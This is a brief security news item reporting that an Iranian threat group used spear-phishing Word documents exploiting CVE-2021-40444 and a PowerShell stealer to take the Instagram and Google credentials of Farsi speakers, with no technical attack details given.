An Iranian threat actor was discovered abusing Instagram and Google credentials of Farsi-speaking individuals around the world. The threat group is using PowerShortShell, a new PowerShell-based stealer for this campaign.
The attacks started in July via spear-phishing emails that targeted Windows users with Winword attachments.
They exploited a remote code execution flaw (CVE-2021-40444) in MSHTML that was disclosed months ago. This flaw was exploited to gain initial access and deliver Cobalt Strike Beacon loaders.
Read More: Cyware
For more such updates follow us on Google News ITsecuritywire News
